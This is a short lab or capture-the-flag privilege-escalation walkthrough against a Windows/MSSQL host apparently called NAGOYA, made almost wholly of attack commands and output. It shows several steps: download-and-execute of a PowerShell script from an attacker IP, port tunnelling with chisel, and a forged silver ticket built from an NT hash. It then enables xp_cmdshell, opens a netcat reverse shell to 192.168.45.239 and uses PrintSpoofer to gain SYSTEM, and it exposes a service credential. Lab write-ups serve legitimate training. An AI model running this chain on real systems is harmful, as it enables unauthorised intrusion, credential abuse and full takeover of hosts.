Priv Esc
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> IEX(New-Object Net.WebClient).downloadString('http://192.168.45.239/PrivescCheck.ps1');Invoke-PrivescCheck
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> netstat -ano | findstr /I 1433
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 2184
TCP [::]:1433 [::]:0 LISTENING 2184
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> iwr 192.168.45.239/chisel.exe -o chisel.exe
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> .\chisel.exe client 192.168.45.239:1335 R:1433:127.0.0.1:1433
chisel.exe : 2024/10/15 19:14:26 client: Connecting to ws://192.168.45.239:1335
+ CategoryInfo : NotSpecified: (2024/10/15 19:1...168.45.239:1335:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2024/10/15 19:14:27 client: Connected (Latency 39.4055ms)
❯ netexec mssql 127.0.0.1 -u svc_mssql -p Service1 --port 1433
MSSQL 127.0.0.1 1433 NAGOYA [*] Windows 10 / Server 2019 Build 17763 (name:NAGOYA) (domain:nagoya-industries.com)
MSSQL 127.0.0.1 1433 NAGOYA [+] nagoya-industries.com\svc_mssql:Service1
❯ impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com Administratorii
❯ export KRB5CCNAME=$PWD/Administrator.ccache
SQL (NAGOYA-IND\Administrator dbo@master)> sp_configure 'show advanced options', '1';
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator dbo@master)> RECONFIGURE;
SQL (NAGOYA-IND\Administrator dbo@master)> sp_configure 'xp_cmdshell', '1';
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator dbo@master)> RECONFIGURE;
SQL (NAGOYA-IND\Administrator dbo@master)> xp_cmdshell whoami
output
--------------------
nagoya-ind\svc_mssql
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> iwr 192.168.45.239/nc.exe -o nc.exeSQL (NAGOYA-IND\Administrator dbo@master)> xp_cmdshell "C:\\programdata\\nc.exe 192.168.45.239 1337 -e powershell.exe"
PS C:\Windows\system32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\programdata> iwr 192.168.45.239/PrintSpoofer64.exe -o printspoofer.exePS C:\programdata> .\printspoofer.exe -i -c powershell.exe
.\printspoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
nagoya-ind\nagoya$
707ad72dba55f91d0bba2cf131119dd7
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.246.21
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.246.254
PS C:\Windows\system32>
Last updated